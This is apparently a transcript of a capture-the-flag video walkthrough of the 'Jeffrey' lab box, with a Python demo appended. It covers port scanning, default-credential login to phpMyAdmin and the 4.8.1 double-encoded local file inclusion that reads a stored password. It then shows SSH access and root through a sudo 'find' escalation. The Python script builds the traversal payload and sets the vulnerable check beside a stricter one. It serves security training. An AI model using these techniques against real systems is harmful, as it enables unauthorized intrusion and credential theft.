Hello everyone, my name is John Hammond, and in this video we're going to be taking a look at some of the challenges from the GuidePoint Security CTF, the capture-the-flag event that was running this past week. I am connected to their VPN, I'm logged in on the scoreboard at 10.10.100.100, and I can hop on over to the challenges. I want to release a couple of videos showcasing these different challenges. We have some network machines that we can take advantage of, and we also have a simple challenge here that doesn't really fit in any other category. There is, of course, a sanity check challenge that is just a simple "hey, copy and paste the flag"; you can go ahead, slap that in, and get your 100 points.

But in this video I want to showcase the Jeffrey box, and that is located at this IP address, 10.10.22. If I open up this first challenge, it says Jeffrey is a network device hosted at that IP address. Your goal is to enumerate this device like you would in a penetration test. That means you can run Nmap, Nikto, DirBuster, Metasploit, etc. There are multiple flags on this challenge; you need to submit each one in its respective challenge card, as we can see on the CTFd board. This challenge is for Jeffrey 1. You will still target that same IP address for the next set of flags. The flags may be found in different locations, like source code, flag.txt files, and others.

So let's go ahead and start to attack this box, now that we have all that information set. I'm going to hop over to my terminal, and I already have a directory created here that I'm going to be working in for this specific CTF. And again, this is a rolling CTF: they're going to be doing a one-week game for like the next couple of months, so it's super duper fun.
You should jump in. We've got this Jeffrey directory and folder created. Let's make an nmap directory so we can store our Nmap scans, and I'll go ahead and kickstart an Nmap scan with default or safe scripts (-sC), -oN to output to a specific directory and format here (the Nmap format), -sV to enumerate versions, and of course the IP address, which we know is 10.10.22. I can slap that in and Nmap will go ahead and run.

Now, when Nmap does this with the default kind of settings, you aren't specifying any specific ports to enumerate; it'll look through the most common 1,000. We can see that 22, or SSH, is open and accessible. It looks like we've got the version, as we specified with our -sV parameter and flag there, and we have it running on an Ubuntu server. That means we know we're working on Linux here. We also have port 80 open, or HTTP for a web server, and it looks like that is hosted with Apache, and the title, as we can see through our scripts, is simply "Jeffrey."

So we could start to enumerate this SSH on port 22. That's normally going to take command-line and console access, but we need credentials to be able to log in, and we don't have credentials yet. So we'll have to enumerate that port 80.

Now, I mentioned Nmap is only going to scan the most common 1,000 ports, but there are 65,535 possible and potential ports. We could kick this off with a larger Nmap scan, saying -p-, and if we're going to go across all those ports, we might as well go all the way and use the -A flag to be aggressive and scan for just about everything that Nmap knows how to do. That is aggressive and will make a lot of noise, and maybe we don't need to do that across every single port. We can kind of trim that down and actually just use RustScan. I really, really like RustScan. It's going to use Rust to make the scanning process much, much faster. It'll look through all of the 65,535 ports first, and then the ones that it finds it'll pass to Nmap, and Nmap will then be aggressive on those specific ports. You can install RustScan if you'd like to; you can do some googling. I'm running it as a Docker image in this case, but you just simply run rustscan, if you set up the alias, and pass in the IP address. If I were to simply slap that in, it sees port 22 and port 80 open, as we saw earlier, but it also sees a new port, 58008. So let's go explore that, because we don't exactly know what it is, and we should also take a look at that web server on port 80.

So we've got the IP address; I can open it in my browser, and we are greeted with just this "Jeffrey" and a little meme GIF here: "who could be scared of a Jeffrey?" Nice. I could right-click and View Page Source, or hit Ctrl+U on my keyboard, and zooming in on this, we don't really have anything here other than bare-bones classic HTML. It doesn't look like there are any secrets. Oh, actually, scrolling (I'm using my horizontal scroll bar to move all the way to the side here), we are seeing one flag: storm CTF Jeffrey one and some simple hash value. We could copy and paste that. There we go, that is our first flag, and we could simply submit that just by viewing the source of the HTML.

That's a good practice, a good thing to do, because they might hide things from us. There might be HTML comments that leave behind developer notes or anything like that. It's always a good practice to view the source of the web page. We could see this if we were to run this with something like curl, or use a command-line tool to get the request information and not have it just rendered out in our browser, because Firefox or Chrome is going to read and interpret this HTML, CSS, and JavaScript. But if we want that raw data, just viewing the source and looking around, being, I don't know, a little more intrusive: hey, let's examine everything that we can see here.
That's a good thing to do. There's our first flag, but there aren't any other links on this page, so there doesn't seem to be anything interesting that we could poke around. But that doesn't mean that there aren't other files or things being hosted on this web server without any link to them, other than the silly Jeffrey GIF. We could try and brute force them or scan for them, so I'll go ahead and do that. I'll kick off Nikto and I'll use -h, not with the flag but with the IP address, and you have to specify the HTTP scheme if you want to use this, so http://10.10.22, and I will tee that out to a nikto.log file so I can save the record of it.

I'll also create another terminal, and let's run DirBuster, or Gobuster, which I like to run because it's based off the command line. We'll run Gobuster in dir mode, and we'll specify the URL with -u, again noting the HTTP scheme, 10.10.202, or sorry, 22, and then we'll specify the wordlist that we want to use with -w. This is going to give it the list of locations that it will try and brute force, scan, and find. I actually will use the DirBuster list, the directory-list lowercase medium one, and I just have that saved in my opt directory, so I could fire that off. If I hit enter on this, Gobuster will go do its thing, and it found actually a WordPress server, which is interesting. Okay, we could, I suppose, go check that out. We'll hop over on 10.10.22, and now we have Jeffrey's blog, which is just another WordPress site. Okay, interesting. We could probably do some other enumeration, like using WPScan or other command-line tools, to look for this stuff. Let's see if there's anything else. Maybe Nikto had found something also.

We can't forget we do have one other port that we should access. If we go to that 58008, we can open this up in our web browser, although we aren't sure if that's what it's going to return with. We could just use netcat or something like a socket to connect to it, but opening it up in our web browser,
we see this butterfly thing that looks like it is connecting to the machine and offering a login prompt here. So if I had credentials, probably I would be able to try and log in. I'm just guessing root and toor, but, okay, nope, that looks like that's wrong. So that's not going to let me in, but that's good to know. Okay, if we had credentials, maybe we could access this machine in a different way, taking advantage of that port.

So let's go check out more of our Nikto and DirBuster scans. Looks like Nikto is finding a lot of strange headers. Gobuster down here has actually found phpMyAdmin. Ooh, and that is worthwhile and interesting to look at, so let's go explore that before we dive into this WordPress. We just have a simple login for phpMyAdmin. At this point, again, we don't know credentials. What we could do, as when we were accessing that butterfly, is try to just guess some common or default or weak credentials, username and password pairs. We could brute force this, we could use Hydra or any other tool, and before we do that, which we might still want to do, we could go for the simple low-hanging fruit, right? Hackers are always going to go for the path of least resistance. If it's a default or super duper common password and username, well, we're not going to try and break through the window if you just left your front door unlocked. So let's try admin and admin as a simple username and password, and that fails. Okay, username admin and password admin is going to give us an access denied. Let's try admin, password. Oh, that looked like it worked. Okay, so now we're logged in to phpMyAdmin.

We have a lot of information over on the side here for the database. It looks like we are running Jeffrey, right, a MySQL server, and that's what phpMyAdmin is going to help work with; that's the kind of purpose of that utility. We also see the user here, and we've got this interesting marquee going on.
Oh, and there's also a flag here. I see storm CTF learners net Jeffrey, and I cannot easily see that, so let's again right-click to View Page Source or hit Ctrl+U. There's a lot of stuff in here, so I'm just going to search for what we know that key is. Let's search "storm CTF." I hit Ctrl+F on my keyboard here, and there we go, there is our flag. We can copy that and go ahead and paste it in on the scoreboard, Jeffrey 2 for 200 points. Slap that in right there, and there are our point values. Great.

What was that marquee saying? It says, "Aldous, quit using the admin account. We removed the permissions and we saved your password at /var/www/Aldous.txt." Ah, okay, that's good to know. Can we access /var/www/Aldous.txt? We can't just go to that in the web browser, can we? If I just try to go to Aldous.txt now, that doesn't work.

So, looking at a web server, right, a web server is often configured with a document root, where in the local server file system all of these files and folders are going to be stored that the web server will be able to actually serve and give to clients. Typically for Apache, that document root is configured to be /var/www/html, and that's a folder. So trying to access files above that, or in different locations on the file system, we won't be able to access them unless we had some sort of vulnerability. If there were some means to access other files on that web server's file system, a really, really good technique that you can use to do this is by abusing local file inclusion. Local file inclusion is a vulnerability, though, so we have to see if maybe the services that we're working with, or what we found on this web server, have that software flaw and are vulnerable to that technique of local file inclusion.

We know, though, that we're working with phpMyAdmin, and it is just going to outright tell us its version number and version information. Looks like we're working with 4.8.1. Neat. With that information, knowing the software name and the software version number, we could probably do some research. We could do our hacker homework, right, and go see if there are any known public vulnerabilities or exploits, off-the-shelf attack scripts and code we could use to take advantage of the software. Let's do that. I'm going to hop over to my terminal one more time, and I don't think we need Gobuster or Nikto here because we've got some decent avenues we could look down. So let's use searchsploit, which will comb through Exploit-DB, or the Exploit Database you can find online, and we'll see if there are any known public vulnerabilities for this sort of thing. We'll search for, again just passing in arguments, the software name and version number that we know here, phpMyAdmin 4.8.1. Now, if I search for that, I do see phpMyAdmin 4.8.1 with an authenticated local file... so that sounds kind of interesting. I'll zoom out here so searchsploit can actually include the proper title, and it says, okay, we do have local file inclusion. We're given a path that we could go ahead and use; searchsploit will allow us to simply examine it. We know we're authenticated already because we were able to log in as the admin user with the password "password." So let's use searchsploit with -x to examine, and pass in this path that it's returned to us. -x will simply let us view the exploit, and since it's a .txt file it might just be general information, a description, or a little blog post or article explaining what this vulnerability is. If it were something like a .c or .py or any other file extension for normally executable code, then we can assume, hey, okay,
that's an already built-out exploit. Let's just take a look at what this .txt file might include. It says the latest version was downloaded from the official website; the file name is the phpMyAdmin 4.8.1 all-languages zip. The problem appears in index.php. If you were taking a look at the source code, you could find the issue in these source lines, and line 61 contains include $_REQUEST['target']. If you see include within PHP and it's not sanitized, not cleaned up to validate against user input, the user could supply something a little bit more malicious and do some more damage with that include. Again, without any clean parameters, that could offer local file inclusion if we were to bypass the restrictions that follow on source lines 55 to 59. Line 57 restricts the target parameter: it has to begin with index, I think, if that's what that explains... line 57 restricts the target parameter from beginning with index. Okay, so yeah, we can't just simply include index at the very, very start. Line 58 limits it: the target parameter cannot appear within target_blacklist, and the target_blacklist definition, that's a variable here on these lines, still found in the source code, so the target parameter can't be import.php or export.php. The last limit is Core::checkPageValidity on the request that we've specified with that target parameter. We could check that out, and that just explains it.
Okay, all that's doing is using urldecode, and that's another function that will be able to process the URL-encoded representation of stuff. Normally, if you were to try and pass a pound symbol, the hashtag, the octothorpe, that might mean an anchor in HTML, a specific link on a page that you might be trying to reference. So if you want to pass that as real data, you will URL-encode that with a percent sign and its hex representation. Sometimes that can be manipulated, because you could encode the encoding and trick some programs that work with this. In this case, we can see the payload here is twice, or double, encoding that percent sign. Again, the %25 is going to actually evaluate to a percent sign, and then the 3f that's left over will access, okay, maybe a dot-dot or forward slash or whatever that might specifically be; we can bypass the validation.

So we're given an example payload here where they're using some proof-of-concept address with phpMyAdmin, going to index.php, supplying this target value, and they're using db_sql.php. That's just going to act as a dummy, because we know it can't be import or export.php from what we read above, and then we'll try to climb the file system. We're going to use a forward slash and a dot-dot to move up to the parent directory, and we'll keep moving up and up until we hopefully eventually reach the root of the file system. That will allow us to climb to any file that we might want within the file system, like /var/www/Aldous.txt, which we know has credentials stored.
So let's try and copy this payload here. We know we're going to phpMyAdmin with an index.php target, and we'll climb up. They're simply using a Windows win.ini file, but we know that we could try and get to /var/www/Aldous.txt. So let's remove all of those Windows notions there and just get to /var/www/Aldous.txt in our URL, and there we go. It says, "Aldous, this is a really insecure way to store your password, so we encoded it so that no one can ever get it without knowing how to decode it. Your encoded password is simply this."

Okay, this looks like base64 encoding, and the way that I know that is just, I guess, experience and gaining familiarity with it. When I notice a random assortment of capital letters and lowercase letters and some numbers thrown in, you gain an eye for it and note that that is base64 encoding. Another incredible telltale is the fact that these equal signs are included at the end. Base64, that encoding scheme, always has to result in a multiple of four in length. If the regular encoding scheme, what it tries to do to operate on that data, representing it in a different way, doesn't end in a multiple of four in length, it'll add on these equal signs as padding so that the final representation does reach a multiple of four in length. So whenever you see these equal signs, that's base64 padding, and that might be a really good indicator that, hey, this is base64.

So let's go ahead and decode it. I will grab that, copy and paste it, throw it on the command line here, and I will run base64 -d. But I will need to supply what I actually want to be decoded into the program, so I'm going to echo right before I run that command: echo, grab this line on standard output, and then pipe that into base64 -d to decode it. Looks like I see "get him to the Greek" in leetspeak. So now we've got some credentials here.
Let's just take note of this. I'll say nano creds.txt: Aldous, that user, I'm assuming, is a user, right, and he has this password, "get him to the Greek." Now we potentially have credentials, so we could try and log in with that butterfly server, the port that we saw on 58008, or we also know that there is SSH accessible. Let's SSH and log into it. I'm going to do that with pwncat, because I really like pwncat. I will open another terminal here and I'll move into pwncat, which I just have cloned and downloaded. I'm going to git pull to make sure that if there are any other changes, I'm going to grab them and download them. Looks like I'm already up to date. So I can activate my virtual environment; I will source the environment's bin/activate. Now I'm in the pwncat virtual environment and I can simply run python -m, specifying a module, pwncat, because that operates as a module, and then I will specify the SSH-like syntax: aldous@10.10.22. That should prompt me for a password, so I will pass in the password that we have. I had that copied and pasted, and now pwncat can connect, so that was the correct password. Awesome.

So pwncat is great because it gives us just a little shell that we can bump around and use, either working as a netcat handler to get a reverse shell, or connect to a bind shell, or SSH in this case. Now we can move into that home directory as that user. I see that there is a flag.txt file there. I'll check the permissions on that; looks like that flag.txt is owned by Aldous, our current user, so I could simply cat flag.txt, and there we go. Now
we have that flag number three. Go ahead and paste that in. Perfect. Let's get back to the box and start to do some more enumeration, because right now we're acting as this Aldous user, but that is likely a low-privilege user, and we want to fully compromise this machine. We want to get the root user, or root privileges and access. So we'll try to look for a privilege escalation vector. We can enumerate, do our homework, do some research, try to find any misconfigurations on this box to be able to do that. pwncat will automate that. You could also just run LinPEAS or some scripts and automated tools that might help you look for privilege escalation vectors. We could go ahead and run, if we mark LinPEAS as executable, ./linpeas, or if that wasn't already on the box, we could try and upload it and bring it in there. In our case, we'll let pwncat do all the work.

So I hit Ctrl+D to just hop to a local terminal, which will give me access to control and automate the victim, or what I'm connected into, with some other scripts. We could run some specific commands like enumerate.gather, and that will simply look for all of the things that LinPEAS might look for, but do it through pwncat, so pwncat can be smart and kind of know and understand how it could leverage and take advantage of the things that it finds. There is a lot of data here, but if I were to run that enumerate.gather and understand what that might be running, I can see the results here. Okay.
It's an Ubuntu server, as we saw, specific version number 16.04. Looks like there are some file systems mounted. We have potential passwords found in different file system locations, and there is a lot that might very well be false positives. It's kind of hard to find what could be a password and what might not be. We could check ASLR, or address space layout randomization; apparently that is enabled. We could see the running processes and who's running them, what process ID and what command was used to start them, etc., etc. And we could also see some interesting sudo rules or configurations that will allow us to run commands as root, or that superuser. Superuser do, or sudo, allows us to run those. That user Aldous that we're running as can run find as any user on this machine without a password. That's awesome. We could probably take advantage of that. That looks like a really good privilege escalation vector.

There are other potential things that enumerate.gather will find for us, like the hostname and network interfaces, setuid or SUID binaries that could be run and take the privileges temporarily of another user, an old version of sudo, maybe potentially this is Dirty COW-able for a kernel exploit, etc., etc., and crontabs. So that was great. We had pwncat do our enumeration that LinPEAS could have done, or we could just do it manually with something like find -perm 4000 to find setuid binaries, or, in the case of the sudo command, you could use sudo -l to list the potential sudo commands you can run as root, in this case with no password.

We can run find. Now, find is a built-in program on Linux systems that we could abuse to actually gain a shell, and if we can run that as root, we can gain a shell as root. We could compromise this machine. You typically can do that with a good resource, GTFOBins. If I were to simply Google GTFOBins, that is a great resource. It's a curated list of Unix binaries that can be exploited and attacked to potentially elevate your privileges or do anything else. You could search for whatever binary you might be working with; in our case, we know we're looking for find, so I'll type that in, and we can see, hey, find can be used to execute and break out of a restricted environment by just spawning a simple shell, and this is the syntax that we could use to do that. There's the command and the arguments, and that's passed along. You could do this with a setuid, or you could do it with sudo, and sudo is the avenue that we know we want to use because this machine has that configuration. So we could just simply run that command and we could get a shell. Slap it in, and looks like I'm root. If I run whoami, I'm root, and we could see that reflected in our prompt. pwncat looks like it's kind of failing, trying to figure out how to properly interpret the prompt here, but let me show you how this is really cool, because GTFOBins is functionality that pwncat knows and understands just as well.

So if I were to again hop back to the local prompt and let pwncat run escalate.auto, it could try and figure out what potential routes it knows that it can abuse to get sudo permissions or privilege escalate to a different user, maybe some lateral escalation move to a different low-privilege user, or follow down a chain to eventually get root. That's kind of neat, and that's kind of cool. pwncat just knows how to do this: if it finds a GTFOBin and it knows how to execute it, it can just get the shell. So let's try to exec and run that same GTFOBin syntax, and now we have gotten a shell as root. If I were to move out of this pwncat prompt, you can see, hey, now I'm the root user. I'll run whoami one more time: I am, in fact, root. So pwncat just did it for us. That was kind of awesome, that's kind of great. You could just simply get on this box with pwncat, run escalate.auto, exec, and then you're root. Very nice, very, very nice. I showed you that to denote the different ways to go about this, the manual way and the automated way with pwncat.
Let's go ahead and grab that root flag. It still thinks that my home directory is /home/aldous, so if I just simply were to type cd, it would bring me there, but I know that the root user's home directory is /root. Because I'm the root user, because I've compromised this box, I can now go ahead and just hop into that directory. I can cat out the flag.txt that is present in there, and there we go. I have Jeffrey 4, and I have fully compromised this machine. I'll go ahead and submit that for 400 points, and this Jeffrey box can be done. Awesome. So that was fun; that was a blast. There was a lot to work through there, some good simple stuff.

If you have any interest in how pwncat does that, pwncat has a big long configuration file that is figuring out what it can do with these GTFOBins, right? So it's, I believe, in the data directory of not just pwncat itself but the pwncat module, so you'll move into pwncat/pwncat and then data. Then you'll find a file, gtfobins.json, and I'll open this up here, but this is minified and compressed, so let's try and make that a little bit more readable. I'll use jq to process that gtfobins.json. I think I need to cat that out and then just pass it into jq on standard input, and there we go. Now I have a ton of output, and I will actually copy and paste that into my clipboard with xclip. Can I jq period? There we go. Awesome.
Now I will move that into my Sublime Text editor and mark the syntax as JSON so I can get some good syntax highlighting, and you can see all of these different types of commands that it would be able to actually execute, different capabilities like writing a file or reading a file or gaining a shell. If I were to look for that find command, you can see, okay, it has an understanding of how to get a shell with the payload, supplying these specific arguments that you saw in GTFOBins, that online resource. You could also try and do unique things like read or write or all of these, and this is obviously a very, very long file. There is support for all the different GTFOBins that the GTFOBins website knows at the moment. Kind of cool, kind of neat.

Okay, that is enough of a safari ride. I hope that was fun. I hope we had a good time exploring that Jeffrey box and cruising through one of the first simple ones. Again, it's meant to be beginner-friendly, it's meant to be kind of hand-holding, it's meant to be something for you to learn from in the GuidePoint Security capture-the-flag exercise. So I hope you will join me in the later videos, where we showcase more of these different boxes and the challenges that we can work through, and when GuidePoint Security does this again next month for another week-long capture-the-flag event, you'll jump in, you'll play, you'll poke around and practice and sharpen your skills, because that's what this is all about. So it's been a long video, but I wanted to showcase some cool stuff here. Thanks so much for watching, everybody. I'll see you in the next video. Take care.
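The double-encoding bypass the advisory text in the video describes (a dummy whitelisted page name, a %253f, then ../ traversal up to /var/www/Aldous.txt) is easier to see in a small model. The Python below is an added example written for this page; it is not code from the video, from the Exploit-DB advisory, or from phpMyAdmin itself. It reimplements the target checks in the order the text lists them (the index prefix rule, target_blacklist, and a checkPageValidity that tests the text before a '?' both before and after one urldecode), shows why the double-encoded payload passes them while a plain traversal does not, and contrasts that with a strict equality check of my own. The whitelist subset, the phpMyAdmin install path, and the traversal depth are assumptions, and the hardened gate is an illustration, not the project's actual patch.

```python
"""Model of the phpMyAdmin 4.8.1 'target' checks and the %253f bypass.

Added example for this page; not phpMyAdmin source and not the advisory's code.
"""
import posixpath
from urllib.parse import unquote

# Assumption: a small subset of phpMyAdmin's page whitelist, enough to show
# why the dummy page name db_sql.php matters.
GOTO_WHITELIST = {"db_sql.php", "db_structure.php", "tbl_sql.php", "sql.php"}
# The two names the advisory text says target_blacklist contains.
TARGET_BLACKLIST = {"import.php", "export.php"}
# Assumption: where phpMyAdmin lives on the target; only used for path resolution.
PMA_DIR = "/var/www/html/phpmyadmin"


def _page_before_query(page: str) -> str:
    """Keep only the text before the first '?' (the mb_substr/mb_strpos step)."""
    return page.split("?", 1)[0]


def check_page_validity(page: str, whitelist=frozenset(GOTO_WHITELIST)) -> bool:
    """Model of Core::checkPageValidity as the advisory describes it:
    exact match, then match on the text before '?', then the same test after
    ONE extra urldecode. That extra decode is the hole."""
    if not page:
        return False
    if page in whitelist or _page_before_query(page) in whitelist:
        return True
    decoded = unquote(page)
    return _page_before_query(decoded) in whitelist


def vulnerable_gate(target: str) -> bool:
    """The three restrictions placed in front of `include $_REQUEST['target']`."""
    if target.startswith("index"):
        return False
    if target in TARGET_BLACKLIST:
        return False
    return check_page_validity(target)


def hardened_gate(target: str) -> bool:
    """Illustrative fix: the value handed to include must be exactly a whitelisted
    page; no prefix logic and no decoding of an already-decoded parameter."""
    return target in GOTO_WHITELIST


def as_seen_by_php(query_value: str) -> str:
    """$_REQUEST['target'] after the web server / PHP performs its single URL decode."""
    return unquote(query_value)


def resolved_include_path(target: str, base: str = PMA_DIR) -> str:
    """Lexical resolution of what `include $target` ends up opening."""
    return posixpath.normpath(posixpath.join(base, target))


def build_payload(abs_path: str, dummy: str = "db_sql.php", depth: int = 6) -> str:
    """Advisory-style payload: dummy page + double-encoded '?' + traversal.
    depth is an assumption; anything >= the number of directories in PMA_DIR works."""
    return f"{dummy}%253f/" + "../" * depth + abs_path.lstrip("/")


def demo() -> dict:
    """Walk one payload through the whole chain and return every intermediate value."""
    raw = build_payload("/var/www/Aldous.txt")
    seen = as_seen_by_php(raw)
    return {
        "query": raw,                       # what goes in the URL
        "php_sees": seen,                   # db_sql.php%3f/../../... (still one % left)
        "vulnerable_gate": vulnerable_gate(seen),   # True: decode once more -> 'db_sql.php?...'
        "hardened_gate": hardened_gate(seen),       # False: not exactly a whitelisted page
        "include_opens": resolved_include_path(seen),  # /var/www/Aldous.txt
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key:16} {value}")
```

Run it with python3 and compare the two gate verdicts: the vulnerable chain only ever compares the part before the '?', and because it decodes a parameter PHP has already decoded once, %253f becomes the '?' that makes db_sql.php%3f/../../var/www/Aldous.txt look like db_sql.php. The include then receives the undecoded string, which resolves lexically to a file outside the document root.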